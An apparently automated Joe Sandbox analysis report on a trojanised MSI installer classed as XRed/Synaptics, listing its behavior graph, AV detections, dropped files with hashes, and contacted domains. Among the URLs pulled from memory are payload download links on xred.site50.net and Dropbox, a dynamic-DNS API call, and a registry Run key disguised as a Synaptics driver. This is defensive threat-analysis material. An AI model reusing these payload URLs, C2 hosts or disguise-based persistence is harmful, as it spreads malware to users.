                          DLL Side-Loading                          		Cached Domain Credentials13
                          System Information Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          File Deletion                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Extra Window Memory Injection                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582349 Sample: xyxmml.msi Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 46 freedns.afraid.org 2->46 48 xred.mooo.com 2->48 50 4 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Antivirus detection for dropped file 2->62 66 10 other signatures 2->66 9 msiexec.exe 8 33 2->9         started        13 EXCEL.EXE 230 66 2->13         started        15 Synaptics.exe 2->15         started        17 msiexec.exe 2 2->17         started        signatures3 64 Uses dynamic DNS services 46->64 process4 file5 38 C:\Windows\Installer\MSID754.tmp, PE32 9->38 dropped 40 C:\Windows\Installer\MSID6D6.tmp, data 9->40 dropped 42 C:\Windows\Installer\63d57e.msi, Composite 9->42 dropped 74 Drops executables to the windows directory (C:\Windows) and starts them 9->74 19 MSID754.tmp 1 5 9->19         started        23 splwow64.exe 1 13->23         started        signatures6 process7 file8 32 C:\Windows\SysWOW64\._cache_MSID754.tmp, PE32 19->32 dropped 34 C:\ProgramData\Synaptics\Synaptics.exe, PE32 19->34 dropped 36 C:\ProgramData\Synaptics\RCXDBF7.tmp, PE32 19->36 dropped 68 Antivirus detection for dropped file 19->68 70 Multi AV Scanner detection for dropped file 19->70 72 Machine Learning detection for dropped file 19->72 25 Synaptics.exe 30 19->25         started        signatures9 process10 dnsIp11 52 drive.usercontent.google.com 142.250.185.161, 443, 49772, 49773 GOOGLEUS United States 25->52 54 docs.google.com 142.250.186.78, 443, 49761, 49762 GOOGLEUS United States 25->54 56 freedns.afraid.org 69.42.215.252, 49770, 80 AWKNET-LLCUS United States 25->56 44 C:\Users\user\Documents\~$cache1, PE32 25->44 dropped 76 Antivirus detection for dropped file 25->76 78 Multi AV Scanner detection for dropped file 25->78 80 Drops PE files to the document folder of the user 25->80 82 Machine Learning detection for dropped file 25->82 30 WerFault.exe 19 16 25->30         started        file12 signatures13 process14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          xyxmml.msi66%ReversingLabsWin32.Trojan.Synaptics

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                          C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                          C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\RCXDBF7.tmp100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\RCXDBF7.tmp100%AviraW2000M/Dldr.Agent.17651006
                          C:\Windows\Installer\MSID754.tmp100%AviraTR/Dldr.Agent.SH
                          C:\Windows\Installer\MSID754.tmp100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                          C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\RCXDBF7.tmp100%Joe Sandbox ML
                          C:\Windows\SysWOW64\._cache_MSID754.tmp100%Joe Sandbox ML
                          C:\Windows\Installer\MSID754.tmp100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                          C:\Windows\Installer\MSID754.tmp92%ReversingLabsWin32.Trojan.Synaptics
                          C:\Windows\SysWOW64\._cache_MSID754.tmp50%ReversingLabsWin32.Trojan.Lisk

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          freedns.afraid.org
                          		69.42.215.252
                          		truefalse
                            		high
                            docs.google.com
                            		142.250.186.78
                            		truefalse
                              		high
                              s-part-0017.t-0009.t-msedge.net
                              		13.107.246.45
                              		truefalse
                                		high
                                drive.usercontent.google.com
                                		142.250.185.161
                                		truefalse
                                  		high
                                  xred.mooo.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    xred.mooo.comfalse
                                      		high
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1MSID754.tmp.2.drfalse
                                              		high
                                              https://docs.google.com/8Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/uritySynaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.com/Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://upx.sf.netAmcache.hve.12.drfalse
                                                        		high
                                                        http://xred.site50.net/syn/Synaptics.rarMSID754.tmp.2.drfalse
                                                          		high
                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978w)Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://xred.site50.net/syn/Synaptics.rarhMSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/dSynaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/google.com/Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXMSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SSLLibrary.dlDMSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1MSID754.tmp.2.drfalse
                                                                              		high
                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1MSID754.tmp.2.drfalse
                                                                                		high
                                                                                https://docs.google.com/MicrosoftSynaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/userSynaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://xred.site50.net/syn/SUpdate.iniMSID754.tmp.2.drfalse
                                                                                        		high
                                                                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978pSynaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docs.google.com/uc?id=0;Synaptics.exe, 00000004.00000002.1608743337.000000000616E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xMSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://xred.site50.net/syn/SSLLibrary.dllMSID754.tmp.2.drfalse
                                                                                                  		high
                                                                                                  https://drive.usercontent.google.com/vSynaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    142.250.186.78
                                                                                                    		docs.google.comUnited States
                                                                                                    		15169GOOGLEUSfalse
                                                                                                    142.250.185.161
                                                                                                    		drive.usercontent.google.comUnited States
                                                                                                    		15169GOOGLEUSfalse
                                                                                                    69.42.215.252
                                                                                                    		freedns.afraid.orgUnited States
                                                                                                    		17048AWKNET-LLCUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1582349
                                                                                                    Start date and time:2024-12-30 11:48:21 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 5m 41s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Run name:Without Instrumentation
                                                                                                    Number of analysed new started processes analysed:19
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:xyxmml.msi
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.expl.evad.winMSI@11/42@4/3
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .msi
                                                                                                    • Close Viewer

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 52.113.194.132, 52.168.117.171, 20.189.173.22, 13.107.246.45, 40.126.32.133, 4.245.163.56
                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus16.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    • VT rate limit hit for: xyxmml.msi

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    05:49:17API Interceptor68x Sleep call for process: Synaptics.exe modified
                                                                                                    05:49:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                    05:51:14API Interceptor18x Sleep call for process: splwow64.exe modified
                                                                                                    10:49:14AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    69.42.215.252valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    s-part-0017.t-0009.t-msedge.netvalyzt.msiGet hashmaliciousXRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                    • 13.107.246.45
                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                    • 13.107.246.45
                                                                                                    universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.45
                                                                                                    freedns.afraid.orgvalyzt.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    AWKNET-LLCUSvalyzt.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                    • 69.42.215.252
                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 69.42.215.252

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    37f463bf4616ecd445d4a1937da06e19valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161
                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    • 142.250.186.78
                                                                                                    • 142.250.185.161

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    C:\ProgramData\Synaptics\RCXDBF7.tmpKOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      C:\Users\user\Documents\~$cache1KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\Config.Msi\63d580.rbs

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):623
                                                                                                        Entropy (8bit):5.283563461763612
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Egmg8mmIdFiS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj8Q:+gTuSkqjM65ptyzAL
                                                                                                        MD5:780AEDA1A128DF4E8E9B58620FD7EEED
                                                                                                        SHA1:E0C79D727C499CAC837330202DB7F3406D140E86
                                                                                                        SHA-256:5C033E877DB0561BCBACEE9AD9DC134A8ED346BC12ADE43C658DF5D0A1EB7328
                                                                                                        SHA-512:B711072723059307E49ACDB1D026C2D36C85806B49CDEF498408BE6F0FA75A7AB414788A86FFC8731BAF3DD9E670F31FD6581897CEEBADD41BB70B006086732D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:...@IXOS.@.....@&..Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..xyxmml.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328...@.....@.....@....

                                                                                                        C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):118
                                                                                                        Entropy (8bit):3.5700810731231707
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d4be583835f61739e072b3b8de18c3e8e49b1d_455b7b6e_84795679-79ec-489f-8b3a-d27896ceee5e\Report.wer

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):1.1334144360839697
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:BL7VpsZImL0jMNtDzJDzqjLOA/ytzxwzuiFjZ24IO8EKDzy:zyZyjMNtJqj8KzuiFjY4IO8zy
                                                                                                        MD5:8846FFAAB60E56F3F79A0440CD9AB345
                                                                                                        SHA1:1B20569172A16836DDA55F80C7D48222B6656120
                                                                                                        SHA-256:30797138E43865AA0E27EF7E521682E41AC4F07B686F452A10ED9AA0C3B46AA8
                                                                                                        SHA-512:E7F325E7198A054AF986F89BDEEFCC2341B9BADF3BB7BAB9EE263EF74807DA009943C09D0AF21095FDDDBDB7B93173BDDA387B01EE64B39762E360F265E8A67E
                                                                                                        Malicious:false
                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.6.4.8.9.9.8.5.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.6.7.6.1.8.6.0.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.7.9.5.6.7.9.-.7.9.e.c.-.4.8.9.f.-.8.b.3.a.-.d.2.7.8.9.6.c.e.e.e.5.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.a.3.0.4.0.5.-.8.4.8.3.-.4.7.c.b.-.b.1.4.5.-.0.1.e.0.6.d.4.f.1.d.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.0.-.0.0.0.1.-.0.0.1.4.-.c.9.c.7.-.1.1.7.6.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.a.3.5.d.7.3.e.5.4.e.4.b.a.1.6.6.a.c.3.0.8.8.9.f.5.7.f.a.5.8.2.8.4.8.8.1.1.0.2.a.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1910.tmp.WERInternalMetadata.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6302
                                                                                                        Entropy (8bit):3.7180671272396433
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJLx66TYiSj6ZOpDy89b/Wsf31m:R6lXJo6TYbo4/1fo
                                                                                                        MD5:0B665C4D1AE44DDA2783AEDB6AB09D81
                                                                                                        SHA1:D5CD9FFCE42786061EBBB77056478BC8EF8ECE0E
                                                                                                        SHA-256:8CB73C4F86FB4CBA0E92AB072CF6A77F9100B7AA5F0E1FDC539FD8B14C668ABE
                                                                                                        SHA-512:71CD836CD32D61706D619CEC6C210BFD05240DE0D45F382037DC1ADF87A011ABE8E4A15352D0DFAECA400A47198377C8579D711E3FCFE68E64D399A33D657E3E
                                                                                                        Malicious:false
